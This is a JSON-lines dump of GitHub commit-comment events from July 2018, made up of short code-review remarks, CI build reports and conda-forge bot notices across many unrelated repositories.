{"id":"8028786527","type":"CommitCommentEvent","actor":{"login":"Skylsmoi"},"repo":{"name":"tracim/tracim_v2"},"payload":{"comment":{"id":29858940,"position":17,"line":429,"path":"frontend/src/container/Dashboard.jsx","commit_id":"c19cb91e4c3ddd1e106c9c583a05dc66bc0c57b0","created_at":"2018-07-27T14:02:50Z","updated_at":"2018-07-27T14:02:50Z","author_association":"COLLABORATOR","body":"empty line"}},"created_at":"2018-07-27T14:02:50Z"}
{"id":"8028787542","type":"CommitCommentEvent","actor":{"login":"SuperAdam47"},"repo":{"name":"PEDevs/PEDevsEssentials"},"payload":{"comment":{"id":29858943,"position":null,"line":null,"path":null,"commit_id":"d6bbfad8fb0f13aaadc949ac53ed5dac3c2968a9","created_at":"2018-07-27T14:03:01Z","updated_at":"2018-07-27T14:03:01Z","author_association":"NONE","body":" benim pull requestleri kabul etseydin kendin neden yaptın :d"}},"created_at":"2018-07-27T14:03:01Z"}
{"id":"8028788964","type":"CommitCommentEvent","actor":{"login":"vshashi01"},"repo":{"name":"vshashi01/MurahBot"},"payload":{"comment":{"id":29858946,"position":33,"line":57,"path":"MurahBot.cpp","commit_id":"de6627e22e16f9a36147c69b59a8cda63ceb44f3","created_at":"2018-07-27T14:03:17Z","updated_at":"2018-07-27T14:03:17Z","author_association":"OWNER","body":"Removing the use of new is a good idea"}},"created_at":"2018-07-27T14:03:17Z"}
{"id":"8028800875","type":"CommitCommentEvent","actor":{"login":"randall-marsh"},"repo":{"name":"svnayden/htsjdk"},"payload":{"comment":{"id":29858978,"position":15,"line":15,"path":"src/main/java/htsjdk/utils/convertorToDatabase/Baracode.java","commit_id":"73939ca9ce328a21196896fa750fd0334671d63e","created_at":"2018-07-27T14:05:24Z","updated_at":"2018-07-27T14:05:24Z","author_association":"COLLABORATOR","body":"Исправил, теперь у каждой сущности есть свой автоматически генерируемый ID, даже если ключом может выступать другой атрибут"}},"created_at":"2018-07-27T14:05:24Z"}
{"id":"8028805489","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/xtrs"},"payload":{"comment":{"id":29858993,"position":7,"line":213,"path":"trs_io.c","commit_id":"d8dc8e4b0606ce2aea3f93013bddd1fb08932ab5","created_at":"2018-07-27T14:06:14Z","updated_at":"2018-07-27T14:06:14Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-27T14:06:14Z"}
{"id":"8028806502","type":"CommitCommentEvent","actor":{"login":"rupansh"},"repo":{"name":"rupansh/chimera_treble"},"payload":{"comment":{"id":29858996,"position":null,"line":null,"path":null,"commit_id":"6234bfb5c11d4d639dbc4157d3847a74781152a6","created_at":"2018-07-27T14:06:26Z","updated_at":"2018-07-27T14:06:26Z","author_association":"OWNER","body":"Shit i meant cpufreq.h wrong commit message ;_;"}},"created_at":"2018-07-27T14:06:26Z"}
{"id":"8028812482","type":"CommitCommentEvent","actor":{"login":"abrahammartin"},"repo":{"name":"uisautomation/sms-webapp"},"payload":{"comment":{"id":29859014,"position":58,"line":44,"path":"ui/tests/test_views.py","commit_id":"c35be11408ee34092f6b84459e8639d67a569168","created_at":"2018-07-27T14:07:33Z","updated_at":"2018-07-27T14:07:33Z","author_association":"MEMBER","body":"is this part of another story?"}},"created_at":"2018-07-27T14:07:33Z"}
{"id":"8028813398","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29859017,"position":null,"line":null,"path":null,"commit_id":"0cd31e635da7d044fc73e7c307aa38023e994b87","created_at":"2018-07-27T14:07:42Z","updated_at":"2018-07-27T14:07:42Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-61](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-61).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-61-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T14:07:42Z"}
{"id":"8028816796","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/pyiron-feedstock"},"payload":{"comment":{"id":29859027,"position":null,"line":null,"path":null,"commit_id":"702d2a62d0d5a03be7321bdb9e6bbd3dae68e738","created_at":"2018-07-27T14:08:19Z","updated_at":"2018-07-27T14:08:19Z","author_association":"MEMBER","body":"Please make changes using a PR from your fork in the future. Any changes pushed to any branch on the main feedstock trigger a release. Also for a change like this the build number needs to be bumped to produce a new package (we don't replace existing packages)."}},"created_at":"2018-07-27T14:08:19Z"}
{"id":"8028817957","type":"CommitCommentEvent","actor":{"login":"jontours"},"repo":{"name":"18F/cg-deploy-bosh"},"payload":{"comment":{"id":29859030,"position":6,"line":59,"path":"operations/external-db.yml","commit_id":"cba8ca2419e0975823b1364056ec3cc408bcc80d","created_at":"2018-07-27T14:08:31Z","updated_at":"2018-07-27T14:08:31Z","author_association":"MEMBER","body":"Will this work?  I believe the certificate needs to be added via a replace, e.g. https://github.com/18F/cg-deploy-cf/blob/master/bosh/opsfiles/diego-rds-certs.yml"}},"created_at":"2018-07-27T14:08:31Z"}
{"id":"8028820265","type":"CommitCommentEvent","actor":{"login":"vharseko"},"repo":{"name":"OpenIdentityPlatform/OpenDJ"},"payload":{"comment":{"id":29859033,"position":null,"line":null,"path":null,"commit_id":"d8a0693ee610f39d28ccaf139869578b08c307ec","created_at":"2018-07-27T14:08:56Z","updated_at":"2018-07-27T14:08:56Z","author_association":"NONE","body":"recommend upgrading to version [OpenDJ 4.1.10](https://github.com/OpenIdentityPlatform/OpenDJ/releases/tag/4.1.10)"}},"created_at":"2018-07-27T14:08:56Z"}
{"id":"8028825308","type":"CommitCommentEvent","actor":{"login":"frunzisss"},"repo":{"name":"haljadooa/twitch-downloader"},"payload":{"comment":{"id":29859047,"position":4,"line":4,"path":"src/chrome/background.js","commit_id":"43f19ad57cd917824d98b2e1c02654f23a3a9397","created_at":"2018-07-27T14:09:50Z","updated_at":"2018-07-27T14:09:50Z","author_association":"NONE","body":"Hi, I'm going to review your code because I have some spare time :)) You don't need quotes for keys in an object."}},"created_at":"2018-07-27T14:09:50Z"}
{"id":"8028830026","type":"CommitCommentEvent","actor":{"login":"hailiangmei"},"repo":{"name":"biopet/biopet"},"payload":{"comment":{"id":29859050,"position":null,"line":null,"path":null,"commit_id":"925f014b0448f97e1547460dd13e00ff24bfcd33","created_at":"2018-07-27T14:10:41Z","updated_at":"2018-07-27T14:10:41Z","author_association":"NONE","body":"@ffinfo , after checking this with Dina, using \"control\" in the sample sheet works with Mutect2. E.g., https://github.com/biopet/biopet/blob/93fa8e8e9f3eacbf717766a46d4382a70f81f0cd/shiva/src/main/scala/nl/lumc/sasc/biopet/pipelines/shiva/Shiva.scala#L72\r\n\r\nHowever, it seems \"normal\" is indeed used here as default value in https://github.com/biopet/biopet/blob/develop/shiva/src/main/scala/nl/lumc/sasc/biopet/pipelines/shiva/ShivaVariantcalling.scala#L92, which is also Mutect2?\r\n\r\nIf you think fixing the doc is sufficient for now, I will make a pull request.\r\n"}},"created_at":"2018-07-27T14:10:41Z"}
{"id":"8028838604","type":"CommitCommentEvent","actor":{"login":"frunzisss"},"repo":{"name":"haljadooa/twitch-downloader"},"payload":{"comment":{"id":29859062,"position":32,"line":26,"path":"src/chrome/background.js","commit_id":"43f19ad57cd917824d98b2e1c02654f23a3a9397","created_at":"2018-07-27T14:12:14Z","updated_at":"2018-07-27T14:12:14Z","author_association":"NONE","body":"you can use template strings also here"}},"created_at":"2018-07-27T14:12:14Z"}
{"id":"8028839619","type":"CommitCommentEvent","actor":{"login":"caesarleroux"},"repo":{"name":"caesarleroux/debmake"},"payload":{"comment":{"id":29859064,"position":null,"line":null,"path":null,"commit_id":"9d5184f6a03262b7a4cd1b28cea743087b12a347","created_at":"2018-07-27T14:12:25Z","updated_at":"2018-07-27T14:12:25Z","author_association":"OWNER","body":"THANKS SO FUCKING MUCH! 🙏🙏🙏👌"}},"created_at":"2018-07-27T14:12:25Z"}
{"id":"8028840837","type":"CommitCommentEvent","actor":{"login":"mmaciejczuk"},"repo":{"name":"mmaciejczuk/chartGenerator"},"payload":{"comment":{"id":29859071,"position":1,"line":1,"path":"src/app/core/service/user.service.ts","commit_id":"7fb4d6a653af9a54cc5bde43315aeeaa687d9532","created_at":"2018-07-27T14:12:38Z","updated_at":"2018-07-27T14:12:38Z","author_association":"OWNER","body":"https://nehalist.io/working-with-models-in-angular/\r\nstruktura wzorowana na powyższym przykładzie"}},"created_at":"2018-07-27T14:12:38Z"}
{"id":"8028845133","type":"CommitCommentEvent","actor":{"login":"mmaciejczuk"},"repo":{"name":"mmaciejczuk/chartGenerator"},"payload":{"comment":{"id":29859077,"position":null,"line":null,"path":null,"commit_id":"7fb4d6a653af9a54cc5bde43315aeeaa687d9532","created_at":"2018-07-27T14:13:25Z","updated_at":"2018-07-27T14:13:25Z","author_association":"OWNER","body":"https://nehalist.io/working-with-models-in-angular/\r\nstruktura 'models/services' wzorowana na powyższym przykładzie"}},"created_at":"2018-07-27T14:13:25Z"}
{"id":"8028845428","type":"CommitCommentEvent","actor":{"login":"frunzisss"},"repo":{"name":"haljadooa/twitch-downloader"},"payload":{"comment":{"id":29859079,"position":44,"line":38,"path":"src/chrome/background.js","commit_id":"43f19ad57cd917824d98b2e1c02654f23a3a9397","created_at":"2018-07-27T14:13:29Z","updated_at":"2018-07-27T14:13:29Z","author_association":"NONE","body":"you can have like \r\n{\r\nurl,\r\n...\r\n}\r\nI can see in other places you do it like this. Consistency is important."}},"created_at":"2018-07-27T14:13:29Z"}
{"id":"8028852451","type":"CommitCommentEvent","actor":{"login":"prestarocket"},"repo":{"name":"PrestaShop/classic-rocket"},"payload":{"comment":{"id":29859089,"position":null,"line":null,"path":null,"commit_id":"a7dd12da4ab35dd8dd42f0ec3335b43e81fa537f","created_at":"2018-07-27T14:14:44Z","updated_at":"2018-07-27T14:14:44Z","author_association":"COLLABORATOR","body":"thx @backamblock !"}},"created_at":"2018-07-27T14:14:44Z"}
{"id":"8028861424","type":"CommitCommentEvent","actor":{"login":"davedelong"},"repo":{"name":"pmusolino/Wormholy"},"payload":{"comment":{"id":29859106,"position":null,"line":null,"path":null,"commit_id":"c02af3316c2ad2fa8991a50361ca0a867980cd13","created_at":"2018-07-27T14:16:22Z","updated_at":"2018-07-27T14:16:22Z","author_association":"CONTRIBUTOR","body":"It defaulted to false before, because it would only look for the environment variable. If the EnvVar wasn’t there, it would enable the shake gesture. "}},"created_at":"2018-07-27T14:16:22Z"}
{"id":"8028866139","type":"CommitCommentEvent","actor":{"login":"vlobzakov"},"repo":{"name":"vlobzakov/docs"},"payload":{"comment":{"id":29859111,"position":null,"line":null,"path":null,"commit_id":"1141daa9024e0a985f5b2d697096159ba31328a7","created_at":"2018-07-27T14:17:14Z","updated_at":"2018-07-27T14:17:14Z","author_association":"OWNER","body":"spelling error in the actions section "}},"created_at":"2018-07-27T14:17:14Z"}
{"id":"8028869163","type":"CommitCommentEvent","actor":{"login":"glumanda"},"repo":{"name":"nodes-at-home/luaNodes"},"payload":{"comment":{"id":29859115,"position":null,"line":null,"path":null,"commit_id":"3d18f985d56bc9a6e90c16fe850e19466bf927e1","created_at":"2018-07-27T14:17:45Z","updated_at":"2018-07-27T14:17:45Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [V0.61.5](https://trello.com/c/LYu6CAyD/114-v0615)"}},"created_at":"2018-07-27T14:17:45Z"}
{"id":"8028869736","type":"CommitCommentEvent","actor":{"login":"glumanda"},"repo":{"name":"nodes-at-home/luaNodes"},"payload":{"comment":{"id":29859118,"position":null,"line":null,"path":null,"commit_id":"94bd867ed1b09e3625dcdd58ecc801ae3a02473e","created_at":"2018-07-27T14:17:52Z","updated_at":"2018-07-27T14:17:52Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [V0.61.5](https://trello.com/c/LYu6CAyD/114-v0615)"}},"created_at":"2018-07-27T14:17:52Z"}
{"id":"8028870246","type":"CommitCommentEvent","actor":{"login":"parkcheolhwan"},"repo":{"name":"parkcheolhwan/idea_project"},"payload":{"comment":{"id":29859121,"position":null,"line":null,"path":null,"commit_id":"74ab43e254b8549d9cd366a8a83019a3aae949bc","created_at":"2018-07-27T14:17:57Z","updated_at":"2018-07-27T14:17:57Z","author_association":"OWNER","body":"이것을 작동하기 위해서는 peri0라는 모듈가 필요합니다. 하지만, 저는 peri0라는 모듈을 제공할 수 없습니다.\r\n정말로 죄송합니다.\r\n(You need a module called peri0 to get this working. However, I can not provide a module called peri0.\r\nI'm really sorry)\r\n（これを作動するためには、peri0というモジュールが必要です。しかし、私はperi0というモジュールを提供することができません。\r\n本当に申し訳ございません。）"}},"created_at":"2018-07-27T14:17:57Z"}
{"id":"8028870472","type":"CommitCommentEvent","actor":{"login":"glumanda"},"repo":{"name":"nodes-at-home/luaNodes"},"payload":{"comment":{"id":29859123,"position":null,"line":null,"path":null,"commit_id":"513c457ac00c43c4861571c2e4d62d83fd43ab92","created_at":"2018-07-27T14:17:59Z","updated_at":"2018-07-27T14:17:59Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [V0.61.5](https://trello.com/c/LYu6CAyD/114-v0615)"}},"created_at":"2018-07-27T14:17:59Z"}
{"id":"8028871042","type":"CommitCommentEvent","actor":{"login":"glumanda"},"repo":{"name":"nodes-at-home/luaNodes"},"payload":{"comment":{"id":29859125,"position":null,"line":null,"path":null,"commit_id":"a7edf3a67a30dcafd4ff2df837792161ebe06eff","created_at":"2018-07-27T14:18:06Z","updated_at":"2018-07-27T14:18:06Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [V0.61.5](https://trello.com/c/LYu6CAyD/114-v0615)"}},"created_at":"2018-07-27T14:18:06Z"}
{"id":"8028871963","type":"CommitCommentEvent","actor":{"login":"glumanda"},"repo":{"name":"nodes-at-home/luaNodes"},"payload":{"comment":{"id":29859126,"position":null,"line":null,"path":null,"commit_id":"671ed48e81a2d3276f810cc57a5a34a187b30799","created_at":"2018-07-27T14:18:16Z","updated_at":"2018-07-27T14:18:16Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [V0.61.5](https://trello.com/c/LYu6CAyD/114-v0615)"}},"created_at":"2018-07-27T14:18:16Z"}
{"id":"8028872402","type":"CommitCommentEvent","actor":{"login":"glumanda"},"repo":{"name":"nodes-at-home/luaNodes"},"payload":{"comment":{"id":29859128,"position":null,"line":null,"path":null,"commit_id":"496c063f28b2cf75eeaa8e475fa89ff24e4f9eaa","created_at":"2018-07-27T14:18:21Z","updated_at":"2018-07-27T14:18:21Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [V0.61.5](https://trello.com/c/LYu6CAyD/114-v0615)"}},"created_at":"2018-07-27T14:18:21Z"}
{"id":"8028873823","type":"CommitCommentEvent","actor":{"login":"annemarie35"},"repo":{"name":"betagouv/pass-culture-pro"},"payload":{"comment":{"id":29859134,"position":null,"line":null,"path":null,"commit_id":"dcfaeee588667b18c17de4b7aa14176ff3f99fe1","created_at":"2018-07-27T14:18:36Z","updated_at":"2018-07-27T14:18:36Z","author_association":"COLLABORATOR","body":"Cool !"}},"created_at":"2018-07-27T14:18:36Z"}
{"id":"8028874402","type":"CommitCommentEvent","actor":{"login":"MalloZup"},"repo":{"name":"MalloZup/kubeojo"},"payload":{"comment":{"id":29859135,"position":11,"line":26,"path":"kubeojo/lib/jenkins/jenkins_analyze.ex","commit_id":"591c0efc4eb9007b831a5c0ba17168121adf2ef0","created_at":"2018-07-27T14:18:42Z","updated_at":"2018-07-27T14:18:42Z","author_association":"OWNER","body":"@vasspilka so here is how i fixed it, now i have real results :+1:  :parasol_on_ground: \r\nthx for the hint :+1: \r\n\r\ni think i can refactor this maybe in a better way, but atm i'm fine with it :smile_cat: \r\n"}},"created_at":"2018-07-27T14:18:42Z"}
{"id":"8028876083","type":"CommitCommentEvent","actor":{"login":"k21971"},"repo":{"name":"NullCGT/SpliceHack"},"payload":{"comment":{"id":29859137,"position":null,"line":null,"path":null,"commit_id":"9150a94c92032d1b0b6b875953b88c4614f20b74","created_at":"2018-07-27T14:19:01Z","updated_at":"2018-07-27T14:19:01Z","author_association":"NONE","body":"You'll need to bump the version in patchlevel.h, this will break saves."}},"created_at":"2018-07-27T14:19:01Z"}
{"id":"8028880712","type":"CommitCommentEvent","actor":{"login":"ozeberle"},"repo":{"name":"back-pack/tienda-asothella"},"payload":{"comment":{"id":29859151,"position":null,"line":null,"path":null,"commit_id":"bc08172cd31226d0c4f15a1c5ce01fcee8f0f9cc","created_at":"2018-07-27T14:19:50Z","updated_at":"2018-07-27T14:19:50Z","author_association":"NONE","body":"Creo que no pasa nada. Lo que sucedió es que quizás re-comiteaste cambios que yo habia comiteado. Solo que vos no los tenías en tu maquina.\r\nLesson learned: Primero cuando abris el VSCode, hacele clic a las flechitas que giran. Eso te trae todo lo que yo hice. Despues empezas a laburar."}},"created_at":"2018-07-27T14:19:50Z"}
{"id":"8028881212","type":"CommitCommentEvent","actor":{"login":"frunzisss"},"repo":{"name":"haljadooa/twitch-downloader"},"payload":{"comment":{"id":29859154,"position":17,"line":17,"path":"src/chrome/settings.js","commit_id":"43f19ad57cd917824d98b2e1c02654f23a3a9397","created_at":"2018-07-27T14:19:57Z","updated_at":"2018-07-27T14:19:57Z","author_association":"NONE","body":"same for this"}},"created_at":"2018-07-27T14:19:57Z"}
{"id":"8028882242","type":"CommitCommentEvent","actor":{"login":"zhan4139"},"repo":{"name":"dancormier/react-native-swipeout"},"payload":{"comment":{"id":29859159,"position":null,"line":null,"path":null,"commit_id":"6bff217b7df9527a80d4e2f52c24838b88ff52f6","created_at":"2018-07-27T14:20:09Z","updated_at":"2018-07-27T14:20:09Z","author_association":"NONE","body":"Error out for this commit, see https://github.com/dancormier/react-native-swipeout/issues/285"}},"created_at":"2018-07-27T14:20:09Z"}
{"id":"8028883040","type":"CommitCommentEvent","actor":{"login":"romkatv"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29859163,"position":52,"line":52,"path":"dns.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-27T14:20:16Z","updated_at":"2018-07-27T14:20:16Z","author_association":"OWNER","body":"When we set ttl=60s, we are saying we don't want to use DNS lookup results that are known to be older than 60 seconds. It doesn't matter why the latest successful DNS lookup results are older than 60 seconds. Perhaps it's because lookups are taking a long time, or because all recent lookups have failed, or because the lookup thread doesn't get scheduled. What we care about is we don't use data we know to be state.\r\n\r\nSometimes we'll still use results that are slightly older than 60 seconds, there is no way to avoid this. But we shouldn't write the code that will make this more likely.\r\n\r\nIf I understand your argument correctly, you are saying that the current code is more likely to discard data older than 60s than if we called `Clock::now()` under a lock. That seems like a good thing.\r\n\r\nIn other words, if we move `Clock::now()` under a lock, the only thing that will change is that in some cases cached data will be used where it wasn't used before, and that data are always older than 60s, meaning that `getaddrinfo()` has returned these data more than 60s ago."}},"created_at":"2018-07-27T14:20:16Z"}
{"id":"8028886739","type":"CommitCommentEvent","actor":{"login":"davedelong"},"repo":{"name":"pmusolino/Wormholy"},"payload":{"comment":{"id":29859173,"position":null,"line":null,"path":null,"commit_id":"c02af3316c2ad2fa8991a50361ca0a867980cd13","created_at":"2018-07-27T14:20:53Z","updated_at":"2018-07-27T14:20:53Z","author_association":"CONTRIBUTOR","body":"*wouldn’t enable\n\nI don’t think this is a good change and should be reverted. If I want the shake gesture enabled, I should still need to specify the environment variable/command line argument, or just turn it on in code, like before. "}},"created_at":"2018-07-27T14:20:53Z"}
{"id":"8028888712","type":"CommitCommentEvent","actor":{"login":"wintondeshong"},"repo":{"name":"codeandfury/hubot-jenkins-enhanced"},"payload":{"comment":{"id":29859175,"position":null,"line":null,"path":null,"commit_id":"47bfbff9f14a40a76274a866c2b4c6ca954e8e4c","created_at":"2018-07-27T14:21:13Z","updated_at":"2018-07-27T14:21:13Z","author_association":"MEMBER","body":"@zack-hable If you would like to be a contributor on this repository instead of creating an entirely new project, I'm happy to add you."}},"created_at":"2018-07-27T14:21:13Z"}
{"id":"8028891861","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29859176,"position":null,"line":null,"path":null,"commit_id":"7ccfd0fa6c56b1b1e1f6c8013be22335a16ff989","created_at":"2018-07-27T14:21:45Z","updated_at":"2018-07-27T14:21:45Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [3737cache](https://3737cache-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/caching-advanced-topics](https://3737cache-static-docs.pantheonsite.io/docs/caching-advanced-topics)\n"}},"created_at":"2018-07-27T14:21:45Z"}
{"id":"8028892709","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29859179,"position":null,"line":null,"path":null,"commit_id":"3cfabd54dd030f0050b7f2ebb9010a80dc403d94","created_at":"2018-07-27T14:21:55Z","updated_at":"2018-07-27T14:21:55Z","author_association":"COLLABORATOR","body":"the problem was that the strings were being looked for like this:\r\n`Something:`\r\n\r\nand in the translation file, they msg ids were:\r\n`Something`\r\n\r\nso it couldn't find them, I took out the `:` from the `I18n.tr()` call and re-extracted and cleaned up."}},"created_at":"2018-07-27T14:21:55Z"}
{"id":"8028893548","type":"CommitCommentEvent","actor":{"login":"frunzisss"},"repo":{"name":"haljadooa/twitch-downloader"},"payload":{"comment":{"id":29859184,"position":30,"line":30,"path":"src/chrome/settings.js","commit_id":"43f19ad57cd917824d98b2e1c02654f23a3a9397","created_at":"2018-07-27T14:22:04Z","updated_at":"2018-07-27T14:22:04Z","author_association":"NONE","body":"what if filename.value is undefined, null, 0, NaN  ... I recommand always using === instead of == it's more safe"}},"created_at":"2018-07-27T14:22:04Z"}
{"id":"8028893909","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29859186,"position":37,"line":2935,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"497f2623c1e4995dd023411b6253f18c2dfd698d","created_at":"2018-07-27T14:22:08Z","updated_at":"2018-07-27T14:22:08Z","author_association":"COLLABORATOR","body":"Is this like _teorik_, or rather according to somebody's opinion?"}},"created_at":"2018-07-27T14:22:08Z"}
{"id":"8028895081","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29859188,"position":null,"line":null,"path":null,"commit_id":"70b7d899f362d29d4337225596139b7aea03fdfe","created_at":"2018-07-27T14:22:21Z","updated_at":"2018-07-27T14:22:21Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2336 of 2336 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-27T14:22:21Z"}
{"id":"8028895469","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29859190,"position":null,"line":null,"path":null,"commit_id":"0cd31e635da7d044fc73e7c307aa38023e994b87","created_at":"2018-07-27T14:22:25Z","updated_at":"2018-07-27T14:22:25Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-63](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-63).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-63-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-27T14:22:25Z"}
{"id":"8028898359","type":"CommitCommentEvent","actor":{"login":"egzonqj"},"repo":{"name":"kwsch/PKHeX"},"payload":{"comment":{"id":29859197,"position":54,"line":45,"path":"PKHeX.Core/Resources/text/es/lang_es.txt","commit_id":"9cfffd30e7e3bb04bbfff017976e5cb9226b145e","created_at":"2018-07-27T14:22:56Z","updated_at":"2018-07-27T14:22:56Z","author_association":"CONTRIBUTOR","body":"I believe puntuación was ok here (I would uppercase first Subterráneo tho)"}},"created_at":"2018-07-27T14:22:56Z"}
{"id":"8028900730","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/modsecurity-feedstock"},"payload":{"comment":{"id":29859203,"position":null,"line":null,"path":null,"commit_id":"f9de184fcfed5d3f17884740a2f236abb24cb619","created_at":"2018-07-27T14:23:21Z","updated_at":"2018-07-27T14:23:21Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @gustavokatel, @davysson0 were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T14:23:21Z"}
{"id":"8028900804","type":"CommitCommentEvent","actor":{"login":"jcgter777"},"repo":{"name":"calc84maniac/tiboyce"},"payload":{"comment":{"id":29859204,"position":null,"line":null,"path":null,"commit_id":"72e66a2d319d4ccbfa573c0095a96501e8000b8e","created_at":"2018-07-27T14:23:22Z","updated_at":"2018-07-27T14:23:22Z","author_association":"NONE","body":"YAY!\r\nOh no. Idek how to build :P I'll figure it out. "}},"created_at":"2018-07-27T14:23:22Z"}
{"id":"8028902993","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29859208,"position":null,"line":null,"path":null,"commit_id":"70b7d899f362d29d4337225596139b7aea03fdfe","created_at":"2018-07-27T14:23:46Z","updated_at":"2018-07-27T14:23:46Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T14:23:46Z"}
{"id":"8028903560","type":"CommitCommentEvent","actor":{"login":"junjun-zhang"},"repo":{"name":"NCI-GDC/gdc-models"},"payload":{"comment":{"id":29859209,"position":21,"line":282,"path":"es-models/case_centric/case_centric.mapping.yaml","commit_id":"7c9886438a437437012e81dee3892dd154c7068a","created_at":"2018-07-27T14:23:52Z","updated_at":"2018-07-27T14:23:52Z","author_association":"MEMBER","body":"This should be boolean"}},"created_at":"2018-07-27T14:23:52Z"}
{"id":"8028904203","type":"CommitCommentEvent","actor":{"login":"tranleduy2000"},"repo":{"name":"axkr/symja_android_library"},"payload":{"comment":{"id":29859210,"position":3,"line":3,"path":"symja_android_library/doc/functions/NMaximize.md","commit_id":"6700fcedb389e048c956dd955c4be7052f62184b","created_at":"2018-07-27T14:23:59Z","updated_at":"2018-07-27T14:23:59Z","author_association":"NONE","body":"NMaximize({maximize_function, constraints}, variables_list)\r\n"}},"created_at":"2018-07-27T14:23:59Z"}
{"id":"8028904900","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/output_viewer-feedstock"},"payload":{"comment":{"id":29859213,"position":null,"line":null,"path":null,"commit_id":"82830c4903bca217f0dbb045ab34125036731b93","created_at":"2018-07-27T14:24:08Z","updated_at":"2018-07-27T14:24:08Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @zshaheen was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @doutriaux1 was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T14:24:08Z"}
